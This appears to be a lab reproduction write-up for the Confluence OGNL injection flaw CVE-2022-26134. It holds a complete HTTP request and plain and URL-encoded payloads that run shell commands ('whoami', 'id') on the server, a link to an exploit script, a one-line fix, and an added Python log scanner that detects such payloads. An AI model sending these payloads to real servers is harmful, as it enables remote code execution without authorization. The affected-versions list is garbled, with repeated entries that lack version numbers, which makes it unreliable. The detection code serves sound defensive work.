Atlassian Confluence Remote Code Execution (CVE-2022-26134)

Vulnerability Description

Affected Versions

  • Confluence Server and Data Center >= 1.3.0
  • Confluence Server and Data Center
  • Confluence Server and Data Center
  • Confluence Server and Data Center
  • Confluence Server and Data Center
  • Confluence Server and Data Center
  • Confluence Server and Data Center
  • Confluence Server and Data Center

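Environment Setup

Here we use the vulhub environment directly. After it starts, you need to apply for a trial license and fill in the relevant configuration.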

docker-compose up -d

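Vulnerability Reproduction

Sending the following request executes an arbitrary command, and the execution result is returned in an HTTP response header: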

GET /%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22whoami%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/ HTTP/1.1
Host: 127.0.0.1:8090
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.61 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=8D0D4FB7E6B7456378BF7388889C86C0
Connection: close

Test PoC

%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22id%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D

${(#a=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec("id").getInputStream(),"utf-8")).(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader("X-Cmd-Response",#a))}

Reproduction with a tool: https://github.com/Nwqda/CVE-2022-26134 (a script written by an expert)

Remediation

Upgrade Atlassian Confluence Server and Data Center to a fixed version.
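
For checking whether an instance has already received requests of the kind shown above, here is an added example (not part of the original post or of any Atlassian tooling) that flags access-log entries whose percent-decoded path carries an OGNL ${...} expression. It assumes Common/Combined Log Format; the log lines, IP addresses and function names are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Assumption: Common/Combined Log Format, request line logged as received.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<uri>\S+) HTTP/[\d.]+"')
# "${...}" wrapper seen in the request path on this page, once percent-decoded.
OGNL_WRAPPER = re.compile(r"\$\{.*\}", re.S)
# Class and method references that appear in the payload on this page.
PAYLOAD_TOKENS = (
    "@java.lang.Runtime@",
    "@org.apache.commons.io.IOUtils@",
    "@com.opensymphony.webwork.ServletActionContext@",
    "getRuntime", "setHeader",
)

# Constructed sample log lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [05/Jun/2022:10:01:02 +0000] "GET /%24%7B%28%23a%3D%40java.lang.Runtime%40getRuntime%28%29.exec%28%22id%22%29%29%7D/ HTTP/1.1" 302 0',
    '198.51.100.4 - - [05/Jun/2022:10:01:05 +0000] "GET /pages/viewpage.action?pageId=65601 HTTP/1.1" 200 8123',
    '203.0.113.9 - - [05/Jun/2022:10:01:09 +0000] "GET /%2524%257B7*7%257D/ HTTP/1.1" 302 0',
]

def fully_decode(value, max_rounds=3):
    """Percent-decode repeatedly so double-encoded payloads are also seen."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify(line):
    """Return None for lines without an OGNL wrapper, else a finding dict."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    # The expression sits in the URI path, so drop the query string first.
    path = fully_decode(m.group("uri").split("?", 1)[0])
    if not OGNL_WRAPPER.search(path):
        return None
    tokens = [t for t in PAYLOAD_TOKENS if t in path]
    return {"client": line.split(" ", 1)[0], "path": path,
            "severity": "high" if tokens else "review", "tokens": tokens}

def scan(lines):
    return [hit for hit in map(classify, lines) if hit]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

A "high" finding means the decoded path also names one of the classes or methods used by the payload on this page; "review" means only the ${...} wrapper was present.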
